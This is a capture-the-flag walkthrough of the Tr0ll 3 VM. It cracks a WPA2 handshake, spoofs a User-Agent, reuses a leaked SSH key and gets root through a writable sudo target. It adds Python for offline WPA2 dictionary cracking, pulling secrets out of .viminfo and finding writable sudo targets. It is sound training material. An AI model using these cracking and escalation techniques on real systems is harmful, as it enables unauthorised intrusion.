Tr0ll 3 – Please don’t feed the Troll (Walkthrough)


The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. The goal is to work through several user levels and finally gain root privileges to read the flag in /root/flag.txt. The following writeup summarises my solution.

Level 0: start

The login information for the first user, start with the password here, is displayed on the console once the virtual machine has booted.

[Screenshot: Tr0ll 3 start screen]

An initial nmap port scan shows that only SSH on port 22 is reachable. That is enough to work on the machine from our own host instead of the VM console.

basto@Malice:~$ ssh start@
start@'s password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


In the home directory of the user start we find the two folders bluepill and redpill.

start@Tr0ll3:~$ ls -al *
total 12
drwxrwxr-x 2 start start 4096 Jun 18  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   18 Jun 17  2015 awesome_work

total 12
drwxrwxr-x 2 start start 4096 Jun 17  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   17 Jun 17  2015 this_will_surely_work

The file awesome_work contains nothing but the URL http://bfy.tw/ODa. If we visit the given link, we will be forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it’s pretty obvious that this clue is a dead end and was placed there as a joke.

basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>

As the story progresses, we are presented with similar information again and again, purely as a distraction. The machine lives up to its name and "trolls" us wherever possible.

The file this_will_surely_work in the redpill directory contains the string step2:Password1!. Instinct says these must be the next credentials, but logging in with them only produces an error message. Yet again, this is only a decoy.

First Clues

With find / -type f -perm 0777 2>/dev/null we list regular files whose mode is exactly rwxrwxrwx, i.e. files that every user on the system can read, modify and execute regardless of their owner (2>/dev/null discards the permission-denied errors from directories we cannot enter; note that -perm 0777 is an exact match, so a 0666 file would not show up). This identifies the first real clues:

start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
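As an added example (not part of the original walkthrough), the following Python script reproduces this enumeration with os.walk and shows the difference between the three find predicates a practitioner usually mixes up: an exact mode match (-perm 0777), "writable by other, whatever else is set" (-perm -o+w) and "setuid bit set" (-perm -4000). The directory tree it scans is constructed in a temporary directory; no paths from the VM are assumed.

```python
#!/usr/bin/env python3
"""Enumerate loosely permissioned files the way the walkthrough's find command does.

Added example, not part of the original write-up. It walks a directory tree
with os.walk and classifies regular files by mode bits, reproducing three
find(1) predicates whose semantics are easy to confuse:
  -perm 0777   exact match: the mode is precisely rwxrwxrwx
  -perm -o+w   all listed bits set: writable by 'other', whatever else is set
  -perm -4000  setuid bit set
The demo tree built at the bottom is constructed here; no VM paths are assumed.
"""
import os
import stat
import tempfile


def classify(path: str) -> dict:
    """Report which of the three predicates a single file satisfies."""
    mode = os.lstat(path).st_mode
    perm = stat.S_IMODE(mode)            # drop file-type bits, keep suid/sgid/sticky
    return {
        "exact_0777": perm == 0o777,
        "world_writable": bool(perm & stat.S_IWOTH),
        "setuid": bool(perm & stat.S_ISUID),
    }


def scan(root: str) -> dict:
    """Walk root and group regular files (-type f) by predicate, sorted for stable output."""
    hits = {"exact_0777": [], "world_writable": [], "setuid": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:              # same effect as the 2>/dev/null in the find call
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                 # symlinks, sockets and the like are not -type f
            for key, hit in classify(path).items():
                if hit:
                    hits[key].append(os.path.relpath(path, root))
    for key in hits:
        hits[key].sort()
    return hits


def build_demo_tree() -> str:
    """Construct a scratch tree with one file per interesting mode (sample data)."""
    root = tempfile.mkdtemp(prefix="permdemo-")
    spec = {
        "rw_only": 0o666,        # world-writable but not executable: missed by -perm 0777
        "fully_open": 0o777,     # matches both -perm 0777 and -perm -o+w
        "suid_helper": 0o4755,   # setuid, the situation of oohfun in the next level
        "private": 0o600,        # matches nothing
    }
    for name, mode in spec.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for key, paths in scan(demo).items():
        print(f"{key:15s} {paths}")
```

The exact match is what makes the page's command blind to a 0666 file; `-perm -o+w` catches it, and `-perm -4000` is the query that finds setuid binaries such as oohfun in the next level.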

On the one hand, we can read the file wytshadow.cap in /var/log/.dist-manage/. tcpdump identifies it as an 802.11 capture containing the EAPOL frames of a WPA2 four-way handshake:

start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.743986 Authentication (Open System)-2: 
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.759857 EAPOL key (3) v2, len 151

If we manage to crack the handshake, the recovered pre-shared key is probably also the password of the user wytshadow.

The file gold_star.txt in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/, on the other hand, contains numerous 10-character strings and serves as the wordlist for the cracking attempt.

aircrack-ng -w gold_star.txt wytshadow.cap
[Screenshot: aircrack-ng output with the cracked key]

aircrack-ng spits out the correct key gaUoCe34t1 after a couple of minutes, and with the new credentials we can switch to the user wytshadow:

start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1
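What aircrack-ng does with every wordlist entry is an offline recomputation of the handshake's message integrity code. The Python below is an added example, not aircrack-ng's code and not the VM's capture: it derives PMK, PTK and KCK as 802.11 specifies, recomputes the EAPOL-Key MIC and compares it, and synthesises a sample handshake (random MACs and nonces, a constructed SSID) from a known passphrase so the attack can be run end to end without the .cap file. It assumes key descriptor version 2 (HMAC-SHA1-128, the usual case for WPA2/CCMP); version 1 uses HMAC-MD5 and version 3 AES-CMAC, which are not implemented here.

```python
#!/usr/bin/env python3
"""Offline WPA2-PSK dictionary attack: the per-candidate computation behind aircrack-ng.

Added example, not part of the original write-up and not aircrack-ng code.
  PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))
  KCK = PTK[0:16]; MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]
Key descriptor version 2 is assumed. The handshake used below is synthesised
from a known passphrase (constructed data, not the VM's capture).
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # EAPOL hdr (4) + desc type (1) + key info (2) + key len (2)
                  # + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8)
MIC_LEN = 16


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes     # 6 bytes, BSSID
    sta_mac: bytes    # 6 bytes, client
    anonce: bytes     # 32 bytes, from message 1
    snonce: bytes     # 32 bytes, from message 2
    eapol: bytes      # an EAPOL-Key frame carrying a MIC (message 2 here)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK derivation from IEEE 802.11: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over the sorted addresses and nonces; yields KCK | KEK | TK (64 bytes)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Descriptor version 2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def mic_matches(hs: Handshake, passphrase: str) -> bool:
    """One candidate check: PMK -> PTK -> KCK, then compare the recomputed MIC."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: the first candidate whose MIC verifies is the pre-shared key."""
    for word in wordlist:
        word = word.strip()
        if word and mic_matches(hs, word):
            return word
    return None


def synthesize_handshake(ssid: str, passphrase: str) -> Handshake:
    """Construct a sample handshake (random MACs and nonces) whose MIC was made with passphrase."""
    ap_mac, sta_mac = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: MIC bit, pairwise, descriptor version 2
            + b"\x00\x10"              # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce
            + b"\x00" * 32             # key IV, key RSC, key ID
            + b"\x00" * MIC_LEN        # MIC placeholder, filled in below
            + b"\x00\x00")             # key data length 0
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce,
                     frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:])


if __name__ == "__main__":
    # SSID and wordlist are constructed for this example; only the last word is from the VM.
    hs = synthesize_handshake("demo-ssid", "gaUoCe34t1")
    print(crack(hs, ["Password1!", "x4tPl!", "xl8Fpx%6", "gaUoCe34t1"]))
```

The cost per candidate is dominated by the 4096 PBKDF2 rounds, which is why a small, targeted list such as gold_star.txt finishes in minutes while a general-purpose wordlist takes hours. Because the SSID is salted into the PMK, a list of precomputed PMKs is only reusable across networks with the same name.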

Level 1: wytshadow

If we look through the home directory of wytshadow, the file oohfun immediately catches our attention. It has the SUID bit set and is owned by genphlux, so it runs with that user's privileges. (It is also world-writable, but that is no shortcut: on Linux, a write by an unprivileged user clears the setuid bit.)

wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------  5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root      root      4096 Jun 19  2015 ..
-rw-------  1 wytshadow wytshadow  297 Aug 22 09:21 .bash_history
-rw-r--r--  1 wytshadow wytshadow  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 wytshadow wytshadow 3637 Jun 17  2015 .bashrc
drwx------  2 wytshadow wytshadow 4096 Jun 17  2015 .cache
drwx------  3 wytshadow wytshadow 4096 Aug  1 01:50 .gnupg
drwxrwxr-x  3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx  1 genphlux  root      8566 Jun 17  2015 oohfun
-rw-r--r--  1 wytshadow wytshadow  675 Jun 17  2015 .profile

However, when we actually run oohfun, it just keeps printing iM Cr@zY L1k3 AAA LYNX:

wytshadow@Tr0ll3:~$ ./oohfun 
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX

Running strings on the binary shows that it simply calls a script:

/lol/bin/run.sh -b

Unfortunately, we cannot modify run.sh: the directory /lol is owned by genphlux and grants other users only the execute (traverse) bit, so we can neither list nor write it.

wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x   8 genphlux root     4096 May 22  2009 lol

sudo -l lists the commands the current user may run through sudo, and as which target user:

wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
    (root) /usr/sbin/service nginx start

The user wytshadow is allowed to start the nginx web server as root, so that is what we do next:

wytshadow@Tr0ll3:~$ sudo service nginx start

A local check of the listening ports with netstat confirms that the web server started: a new service is listening on port 8080.

wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0  *               LISTEN

However, we cannot use the web service: every request is rejected with 403 Forbidden.

basto@Malice:~$ curl
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>

To narrow down the problem, we open /etc/nginx/sites-ed/default and look at the default server configuration of nginx. Right at the top we notice the following block:

# Default server configuration
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
            if ($http_user_agent !~ "Lynx*"){
                return 403;
            }
        # ... remainder of the server block
}

The condition is a regular-expression match: unless the User-Agent header matches Lynx*, the server answers 403. (The pattern is unanchored and sloppy; it is satisfied by the substring Lyn, with or without trailing x's, anywhere in the header.) Since the file is read-only for us, we cannot change the configuration, but with curl we can simply send a User-Agent header of the expected form:

basto@Malice:~$ curl -H "User-Agent: Lynx Basto"

The response contains the credentials for genphlux, which we use to switch user:

wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!

Level 2: genphlux

As always, we first take a look at the home directory of the new user.

genphlux@Tr0ll3:~$ ls -al
total 52
drwx------  5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
-rw-------  1 genphlux genphlux  273 Aug 22 10:09 .bash_history
-rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
drwx------  3 genphlux genphlux 4096 Aug  1 04:03 .gnupg
drwxrwxr-x  3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
-rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
-rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
-rw-rw-r--  1 genphlux genphlux  931 Aug  2 15:56 xlogin

The file xlogin is merely a saved HTML directory listing of the web directory /xlogin (its footer names an Apache server on port 80, not the nginx we just started) and does not help us in any way.


  <title>Index of /xlogin</title>
<h1>Index of /xlogin</h1>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>

The file maleus, on the other hand, is far more interesting. It contains an RSA private key, most likely for SSH.


Now we try to log in as the user maleus with this private key. However, the ssh client refuses to use a private key file whose permissions are too broad (the file is group- and world-readable), so we first have to tighten its permissions.

genphlux@Tr0ll3:~$ chmod 600 maleus 
genphlux@Tr0ll3:~$ ssh -i maleus maleus@
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Level 3.1: maleus (private key)

Since we do not know the password of maleus yet, we cannot list the sudo rules with sudo -l (it prompts for the user's password first). However, several files in the home directory deserve our attention.

maleus@Tr0ll3:~$ ls -al
total 80
drwx------  6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root   root   4096 Jun 19  2015 ..
-rw-------  1 maleus maleus   42 Dec 19 07:05 .bash_history
-rw-r--r--  1 maleus maleus  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 maleus maleus 3637 Jun 17  2015 .bashrc
drwx------  2 maleus maleus 4096 Jun 17  2015 .cache
-rwxrwxr-x  1 maleus maleus   37 Aug 22 10:04 dont_even_bother
drwx------  3 maleus maleus 4096 Aug  1 03:48 .gnupg
-rw-rw-r--  1 maleus maleus  145 Jun 18  2015 index.html
drwxrwxr-x  3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r--  1 maleus maleus  675 Jun 17  2015 .profile
drwx------  2 maleus maleus 4096 Jun 18  2015 .ssh
-rw-------  1 maleus maleus 1301 Aug  2 16:02 .viminfo
-rw-rw-r--  1 maleus maleus  931 Aug 22 09:55 xlogin

The source code of index.html seems to reveal the next clue immediately:


<img src="pic.jpg">
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >

Unfortunately, it’s not possible to login as the user fido with the given password. It seems as if the troll has yet again played with our emotions.

Likewise, the file dont_even_bother leads nowhere. Running it prompts for a password:

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : 

 Wrong Password

A quick look at the strings contained in the binary reveals the required value among its literals:

maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password : 

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : xl8Fpx%6

 Correct Password 

 Your reward is just knowing you did it! :-P

So it looks like we still haven’t gotten anywhere with this user.

The file .viminfo is where Vim persists its state between sessions: command-line and search history, marks, and the contents of the registers (text that was yanked, deleted or pasted). Among other things it contains the following excerpt from the register section, which appears to hold a password that was typed into the editor:


# Registers:
""1     LINE    0
"2      LINE    0
"3      LINE    0
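Because .viminfo also persists register contents, it is worth triaging such files systematically instead of eyeballing them. The Python parser below is an added example, not from the original walkthrough: it reads the classic viminfo text format (register headers such as ""1<TAB>LINE<TAB>0 followed by tab-indented content lines, and history entries starting with ':' or '/'), skips the '|'-prefixed records that newer Vim versions write alongside, and flags values that look like credentials. The sample viminfo and the secrets in it are constructed; they are not the VM's.

```python
#!/usr/bin/env python3
"""Triage a .viminfo file for leftover secrets.

Added example, not part of the original write-up. Vim's .viminfo persists more
than command history: it also stores register contents (text yanked, deleted
or pasted), search strings and file marks, so a pasted password survives in a
register long after the buffer was closed. This parser reads the classic text
format, in which a register entry looks like
    ""1<TAB>LINE<TAB>0
    <TAB>the register's text
(the extra leading quote marks the register the unnamed register points to)
and history entries are lines starting with ':' or '/'. The '|'-prefixed
records newer Vim versions add carry the same data and are skipped.
The sample file at the bottom is constructed for this example.
"""
import re
from typing import Dict, List, Tuple

REG_HEADER = re.compile(r'^""?(.)\t(CHAR|LINE|BLOCK)\t(\d+)$')
SECRET_HINT = re.compile(r"(?i)pass|pwd|secret|token|cred|sudo")


def parse_viminfo(text: str) -> dict:
    """Return registers, command-line history and search history as plain strings."""
    registers: Dict[str, List[str]] = {}
    commands: List[str] = []
    searches: List[str] = []
    section = ""
    current = None
    for line in text.splitlines():
        if line.startswith("# "):                 # section header, e.g. "# Registers:"
            section = line[2:].rstrip(":")
            current = None
            continue
        if line.startswith("|") or not line.strip():
            continue                               # new-style duplicate record or blank line
        if section == "Registers":
            m = REG_HEADER.match(line)
            if m:
                current = m.group(1)
                registers[current] = []
            elif line.startswith("\t") and current is not None:
                registers[current].append(line[1:])
        elif section.startswith("Command Line History") and line.startswith(":"):
            commands.append(line[1:])
        elif section.startswith("Search String History") and line[:1] in "/?":
            searches.append(line[1:])
    return {"registers": registers, "commands": commands, "searches": searches}


def looks_like_secret(s: str) -> bool:
    """Cheap heuristic: user:pass tokens, dense single tokens, or telltale keywords."""
    s = s.strip()
    if not s or len(s) > 64:
        return False
    if re.fullmatch(r"[^\s:]+:\S+", s):           # the user:password convention used on this VM
        return True
    if " " not in s and re.search(r"[A-Z]", s) and re.search(r"[0-9]", s) \
            and re.search(r"[^A-Za-z0-9]", s):
        return True                               # one token mixing cases, digits and symbols
    return bool(SECRET_HINT.search(s))


def find_candidates(text: str) -> List[Tuple[str, str]]:
    """List (where, value) pairs worth a second look, registers first."""
    info = parse_viminfo(text)
    hits = []
    for name, lines in info["registers"].items():
        for value in lines:
            if looks_like_secret(value):
                hits.append((f'register "{name}', value))
    hits += [("cmdline", c) for c in info["commands"] if looks_like_secret(c)]
    hits += [("search", s) for s in info["searches"] if looks_like_secret(s)]
    return hits


# Constructed sample; the values are placeholders, not data from the VM.
SAMPLE_VIMINFO = (
    "# This viminfo file was generated by Vim 8.0.\n"
    "\n"
    "# Command Line History (newest to oldest):\n"
    ":q!\n"
    '|2,0,1560000000,,"q!"\n'
    ":w !sudo tee /etc/hosts\n"
    "\n"
    "# Search String History (newest to oldest):\n"
    "/password\n"
    "\n"
    "# Registers:\n"
    '""1\tLINE\t0\n'
    "\tExamplePassw0rd!\n"
    '|3,1,1,1,1,0,1560000000,"ExamplePassw0rd!"\n'
    '"2\tLINE\t0\n'
    "\tjust a scratch line\n"
    '"3\tCHAR\t0\n'
    "\tdeploy:Sup3r-Pa55\n"
    "\n"
    "# File marks:\n"
    "'0  1  0  ~/notes.txt\n"
)

if __name__ == "__main__":
    for where, value in find_candidates(SAMPLE_VIMINFO):
        print(f"{where:12s} {value}")
```

The same idea applies to .bash_history, .lesshst, .mysql_history and .psql_history, which are usually the next files to check after .viminfo.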

Level 3.2: maleus (password)

With the newly found password we can now run sudo -l, which gives us the next hint:

maleus@Tr0ll3:~$ sudo -l 
[sudo] password for maleus: 
Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother

As we can see, the user maleus has the ability to execute the file /home/maleus/dont_even_bother with the permissions of the root user.

We can’t do much with the current version of the file, but our user is permitted to modify it. Thus, we overwrite dont_even_bother with the command to start a new shell.

maleus@Tr0ll3:~$ echo "bash" > dont_even_bother

Next we execute the overwritten file with sudo:

maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)
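The general lesson of this level is that a sudo rule pointing at a file the user can write, or can replace because the containing directory is writable, is a root shell. The Python below is an added example, not part of the original walkthrough: it parses sudo -l output (the sample is the maleus output shown above), extracts the command paths and tests whether the current user can write each file or its parent directory. The scratch files in the demo are constructed here.

```python
#!/usr/bin/env python3
"""Check whether any sudo rule points at a program the current user can replace.

Added example, not part of the original write-up. Given the text printed by
'sudo -l', it extracts the "(runas) command" entries and tests the two
conditions that turned /home/maleus/dont_even_bother into a root shell:
the target file is writable, or its directory is writable (so the file can be
swapped even when the file itself is not, and created if it does not exist).
The sample sudo -l text is the one shown in the walkthrough; the scratch files
created by the demo are constructed here.
"""
import os
import re
import tempfile
from typing import List, Tuple

RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<flags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(output: str) -> List[Tuple[str, str, List[str]]]:
    """Return (runas, command path, tag list) per command after the 'may run' header."""
    rules = []
    seen_header = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            seen_header = True
            continue
        if not seen_header:
            continue                              # skip the Defaults section
        m = RULE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("flags").split()]
        for entry in m.group("cmd").split(","):   # "cmd1, cmd2 arg" lists several commands
            words = entry.split()
            if words:
                rules.append((m.group("runas").strip(), words[0], tags))
    return rules


def writable_targets(rules: List[Tuple[str, str, List[str]]]) -> List[Tuple[str, str]]:
    """Rules whose command file, or its parent directory, the current user can write."""
    hits = []
    for _runas, cmd, _tags in rules:
        if not cmd.startswith("/"):
            continue                              # ALL, sudoedit etc. need manual review
        if os.access(cmd, os.W_OK):
            hits.append((cmd, "file writable"))
        elif os.access(os.path.dirname(cmd), os.W_OK):
            hits.append((cmd, "directory writable"))
    return hits


# The sudo -l output for maleus as shown in the walkthrough.
SUDO_L_OUTPUT = r"""Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother
"""


def demo_writable() -> List[Tuple[str, str]]:
    """Construct three targets in a scratch directory and run the check on them."""
    root = tempfile.mkdtemp(prefix="sudochk-")
    owned = os.path.join(root, "dont_even_bother")      # writable by us, like the real one
    with open(owned, "w") as fh:
        fh.write("#!/bin/sh\necho 'Wrong Password'\n")
    os.chmod(owned, 0o755)
    locked = os.path.join(root, "locked")               # read-only file in a directory we own
    with open(locked, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(locked, 0o555)
    missing = os.path.join(root, "not_installed_yet")   # rule for a path that does not exist
    return writable_targets([("root", owned, []), ("root", locked, []), ("root", missing, [])])


if __name__ == "__main__":
    print(parse_sudo_l(SUDO_L_OUTPUT))   # [('root', '/home/maleus/dont_even_bother', [])]
    for cmd, reason in demo_writable():
        print(f"{reason:20s} {cmd}")
```

Run on the real box, `writable_targets(parse_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout))` would flag dont_even_bother as "file writable". Note that os.access answers for the real user ID, so when the script itself runs as root every existing file reports as writable.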

Level 4: root

As the final step we can now use our root privileges to read the contents of the flag:

root@Tr0ll3:~# cat /root/flag.txt 
You are truly a Jedi!
